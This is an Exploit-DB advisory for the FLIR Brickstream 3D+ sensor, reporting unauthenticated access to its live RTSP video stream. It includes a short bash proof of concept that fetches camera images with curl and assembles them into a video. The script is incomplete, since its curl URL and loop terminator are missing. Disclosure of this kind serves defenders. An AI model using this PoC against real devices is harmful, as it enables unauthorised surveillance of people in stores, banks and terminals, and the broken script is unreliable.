FLIR Brickstream 3D+ - RTSP Stream Disclosure

EDB-ID: 45607
Author: LiquidWorm
Published: 2018-10-15
Type: Webapps
Platform: Hardware
Vulnerable App: N/A


Vendor: FLIR Systems, Inc.
Product web page:
Affected version: Firmware: 2.1.742.1842
Api: 1.0.0
Node: 0.10.33

Summary: The Brickstream line of sensors provides highly accurate, anonymous
information about how people move into, around, and out of physical places.
These smart devices are installed overhead inside retail stores, malls, banks,
stadiums, transportation terminals and other brick-and-mortar locations to
measure people's behaviors within the space.

Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated and
unauthorized live RTSP video stream access.

Tested on: Titan

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2018-5496
Advisory URL:



# PoC:

echo 'Fetching some images...'
for x in {1..10};
do curl -o sequence-$x.jpg -#;
echo 'Done.'
sleep 2
echo 'Generating video...'
sleep 2
ffmpeg -r 1 -i sequence-%01d.jpg -c:v libx264 -vf fps=60 -pix_fmt yuv444p counted_people.mp4
echo 'Running generated video...'
sleep 2
vlc counted_people.mp4


Related Posts